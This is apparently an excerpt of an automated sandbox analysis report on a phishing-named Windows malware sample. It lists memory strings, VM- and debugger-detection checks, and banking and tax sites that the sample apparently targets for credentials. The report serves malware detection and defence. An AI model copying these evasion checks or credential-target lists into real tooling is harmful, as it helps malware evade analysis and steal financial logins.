                      Source: P.Order request for quotations.exe, 00000000.00000002.1034365516.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.000000000289E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.1458939170.0000020FC993C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ok.office365.comVMware20,11696494690t
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: wscript.exe, 00000006.00000002.1141813975.000002414CE84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.00000000057DE000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.0000000004CCE000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,R0lGODlhmAAbAPcAAJORkXPC5+vr6o6NjAmT1SSf2ujo6K3b8R6c2YyKihCW1vb29vHx8eLi4trv+Wm+5qalpc/OzmK65LTe8qLW702w4ZaVlJ6dne3t7ZrS7jyp3oXJ6tLr939+fcbm9XZ0dACDz0lHRun1+xWY13p4eFhWVSOe2ubm5vj4+KTX8MjIyECr3+Tk5ACK0sTExCKe2VCy4TGl3OHy+l245OHh4cHk9fX6/VS04tPT01ZVVEE/PqnZ8AaS1QCN0z08Ozw6OURDQlxaWU9NTIiHh0eu4Pr9/gSR1F5dXGRjYmNhYYqJiFNRUM7p9wCI0VtZWbjg85qZmXx7emdlZYF/fyag2r29vBiZ2ACF0A2U1nh3dtbt+HRzcoKBgP///29ubb7j9BKX17Ld8jmn3YSCgnnE6GxramhnZgqT1QaR1AKQ1AKP1Dg2NSCd2cHBwEZEQ93c3CGd2fb29Y2Miyqi2/T09PPz89nY2KGgoL6+ve7u7la14vz8/N/f34mIh8fGxjs5OMrJyfr6+mBeXfv7+6inpjk3NmloZ62srNbW1rKxsd7e3vX19To4N8LCwSGe2e/v7/7+/kdFRKuqqVpYV1VTUkJAP0Os3/Ly8tbV1Q+W1pybmqiop5GQj11cW/39/cbFxUNBQExKSa6tra+urabY8O/u7rm4uLq6udjY18vKyv7//yig2ra1taqpqZ2cm1JQT2a85eDf37y7u09OTff8/ktJSE5MS6Ggn/r5+bq5uJCPj7++voWEg/Py8tXU1MPCwtrZ2cro9qKhoWW75aurqg+V1p/V77W0tLOzsra2tWy+5pWUk7Cvryaf2kWt3zam3ZeWlimi25mYl0pIRxyb2IvM62VkYxma2KCfnsTDw4GAf1ZUU4eGhRSX1xOT1QKQ01i146+vruf0+8Dj9MjHx4HI6j89PLe2tuTz+/L5/dDQz+33/MzMzM7NzQB8zRCV1ufn5nNxcJDO7OPj4q/c8ayrq9ra2tHQ0NLR0bGwsLOysaOioqmoqNTU06XY7wyU1SH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxMzggNzkuMTU5ODI0LCAyMDE2LzA5LzE0LTAxOjA5OjAxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1wTU06T3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjk5NTgzMjIwLWJlMzItMzE0OC05YTM2LThjMjIwOGQwNjhkMyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpFNDk5NUIzQzFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpFNDk5NUIzQjFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNyAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo3NWU3N2M0ZC1iMjc5LWJhNGYtYjg0Ny04OGRhN2Y4NTFiYjIiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6OTk1ODMyMjAtYmUzMi0zMTQ4LTlhMzYtOGMyMjA4ZDA2OGQzIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+Af/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwLCgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAAJgAGwAACP8Auwgc2IUDrBhzEipUqEwLwYcQI0qcSLGixYsYM2qM+ISNx48vFPAgMLIAHA4bU6pcybJlygkgP6aJUYFIhRjdTFhyybOnz58Tw8SEw6YJjHQEVxBgIwOo06dQMR4YWvQGRDFLm1K0B2FAlCGuPj2KOjECtj5f90WIQ/YpKapGrxrRqWoinzJr8updAwDiAgZQVXTaWygvq7ZAU8CdIZcoE7s/COvFM3DeqA6RhD11IVmvIsQ+ayxuzKYGxcF6O2gCkARUnoGC9PJzusCHXh3cNCUoUQK0T0tDjcB6uC5GE8eQIOvFQbBOcoFIZEtkwGLsRQyeBFa5Taf5dHiDLNb/wZ59owA
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: global block list test formVMware20,11696494690
                      Source: HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,116Kl
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360759390.0000000000C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169649469
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696494690n
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B096E rdtsc 2_2_017B096E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00417E13 LdrLoadDll,2_2_00417E13
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01814180 mov eax, dword ptr fs:[00000030h]2_2_01814180
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01814180 mov eax, dword ptr fs:[00000030h]2_2_01814180
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182C188 mov eax, dword ptr fs:[00000030h]2_2_0182C188
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182C188 mov eax, dword ptr fs:[00000030h]2_2_0182C188
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C156 mov eax, dword ptr fs:[00000030h]2_2_0176C156
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776154 mov eax, dword ptr fs:[00000030h]2_2_01776154
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776154 mov eax, dword ptr fs:[00000030h]2_2_01776154
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018361C3 mov eax, dword ptr fs:[00000030h]2_2_018361C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018361C3 mov eax, dword ptr fs:[00000030h]2_2_018361C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A0124 mov eax, dword ptr fs:[00000030h]2_2_017A0124
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018461E5 mov eax, dword ptr fs:[00000030h]2_2_018461E5
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A01F8 mov eax, dword ptr fs:[00000030h]2_2_017A01F8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov ecx, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov ecx, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov ecx, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov eax, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E10E mov ecx, dword ptr fs:[00000030h]2_2_0181E10E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01830115 mov eax, dword ptr fs:[00000030h]2_2_01830115
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181A118 mov ecx, dword ptr fs:[00000030h]2_2_0181A118
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181A118 mov eax, dword ptr fs:[00000030h]2_2_0181A118
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181A118 mov eax, dword ptr fs:[00000030h]2_2_0181A118
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181A118 mov eax, dword ptr fs:[00000030h]2_2_0181A118
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE1D0 mov eax, dword ptr fs:[00000030h]2_2_017EE1D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE1D0 mov eax, dword ptr fs:[00000030h]2_2_017EE1D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE1D0 mov ecx, dword ptr fs:[00000030h]2_2_017EE1D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE1D0 mov eax, dword ptr fs:[00000030h]2_2_017EE1D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE1D0 mov eax, dword ptr fs:[00000030h]2_2_017EE1D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01804144 mov eax, dword ptr fs:[00000030h]2_2_01804144
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01804144 mov eax, dword ptr fs:[00000030h]2_2_01804144
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01804144 mov ecx, dword ptr fs:[00000030h]2_2_01804144
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01804144 mov eax, dword ptr fs:[00000030h]2_2_01804144
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01804144 mov eax, dword ptr fs:[00000030h]2_2_01804144
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01808158 mov eax, dword ptr fs:[00000030h]2_2_01808158
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F019F mov eax, dword ptr fs:[00000030h]2_2_017F019F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F019F mov eax, dword ptr fs:[00000030h]2_2_017F019F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F019F mov eax, dword ptr fs:[00000030h]2_2_017F019F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F019F mov eax, dword ptr fs:[00000030h]2_2_017F019F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A197 mov eax, dword ptr fs:[00000030h]2_2_0176A197
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A197 mov eax, dword ptr fs:[00000030h]2_2_0176A197
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A197 mov eax, dword ptr fs:[00000030h]2_2_0176A197
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B0185 mov eax, dword ptr fs:[00000030h]2_2_017B0185
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179C073 mov eax, dword ptr fs:[00000030h]2_2_0179C073
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772050 mov eax, dword ptr fs:[00000030h]2_2_01772050
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018080A8 mov eax, dword ptr fs:[00000030h]2_2_018080A8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6050 mov eax, dword ptr fs:[00000030h]2_2_017F6050
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018360B8 mov eax, dword ptr fs:[00000030h]2_2_018360B8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018360B8 mov ecx, dword ptr fs:[00000030h]2_2_018360B8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A020 mov eax, dword ptr fs:[00000030h]2_2_0176A020
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C020 mov eax, dword ptr fs:[00000030h]2_2_0176C020
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E016 mov eax, dword ptr fs:[00000030h]2_2_0178E016
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E016 mov eax, dword ptr fs:[00000030h]2_2_0178E016
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E016 mov eax, dword ptr fs:[00000030h]2_2_0178E016
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E016 mov eax, dword ptr fs:[00000030h]2_2_0178E016
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F4000 mov ecx, dword ptr fs:[00000030h]2_2_017F4000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01812000 mov eax, dword ptr fs:[00000030h]2_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C0F0 mov eax, dword ptr fs:[00000030h]2_2_0176C0F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B20F0 mov ecx, dword ptr fs:[00000030h]2_2_017B20F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0176A0E3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017780E9 mov eax, dword ptr fs:[00000030h]2_2_017780E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F60E0 mov eax, dword ptr fs:[00000030h]2_2_017F60E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F20DE mov eax, dword ptr fs:[00000030h]2_2_017F20DE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806030 mov eax, dword ptr fs:[00000030h]2_2_01806030
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177208A mov eax, dword ptr fs:[00000030h]2_2_0177208A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov eax, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov eax, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov eax, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov ecx, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov eax, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F035C mov eax, dword ptr fs:[00000030h]2_2_017F035C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F2349 mov eax, dword ptr fs:[00000030h]2_2_017F2349
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182C3CD mov eax, dword ptr fs:[00000030h]2_2_0182C3CD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018143D4 mov eax, dword ptr fs:[00000030h]2_2_018143D4
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018143D4 mov eax, dword ptr fs:[00000030h]2_2_018143D4
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E3DB mov eax, dword ptr fs:[00000030h]2_2_0181E3DB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E3DB mov eax, dword ptr fs:[00000030h]2_2_0181E3DB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E3DB mov ecx, dword ptr fs:[00000030h]2_2_0181E3DB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181E3DB mov eax, dword ptr fs:[00000030h]2_2_0181E3DB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C310 mov ecx, dword ptr fs:[00000030h]2_2_0176C310
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01790310 mov ecx, dword ptr fs:[00000030h]2_2_01790310
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA30B mov eax, dword ptr fs:[00000030h]2_2_017AA30B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA30B mov eax, dword ptr fs:[00000030h]2_2_017AA30B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA30B mov eax, dword ptr fs:[00000030h]2_2_017AA30B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A63FF mov eax, dword ptr fs:[00000030h]2_2_017A63FF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E3F0 mov eax, dword ptr fs:[00000030h]2_2_0178E3F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E3F0 mov eax, dword ptr fs:[00000030h]2_2_0178E3F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E3F0 mov eax, dword ptr fs:[00000030h]2_2_0178E3F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017803E9 mov eax, dword ptr fs:[00000030h]2_2_017803E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A3C0 mov eax, dword ptr fs:[00000030h]2_2_0177A3C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017783C0 mov eax, dword ptr fs:[00000030h]2_2_017783C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017783C0 mov eax, dword ptr fs:[00000030h]2_2_017783C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017783C0 mov eax, dword ptr fs:[00000030h]2_2_017783C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017783C0 mov eax, dword ptr fs:[00000030h]2_2_017783C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F63C0 mov eax, dword ptr fs:[00000030h]2_2_017F63C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183A352 mov eax, dword ptr fs:[00000030h]2_2_0183A352
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01818350 mov ecx, dword ptr fs:[00000030h]2_2_01818350
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179438F mov eax, dword ptr fs:[00000030h]2_2_0179438F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179438F mov eax, dword ptr fs:[00000030h]2_2_0179438F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181437C mov eax, dword ptr fs:[00000030h]2_2_0181437C
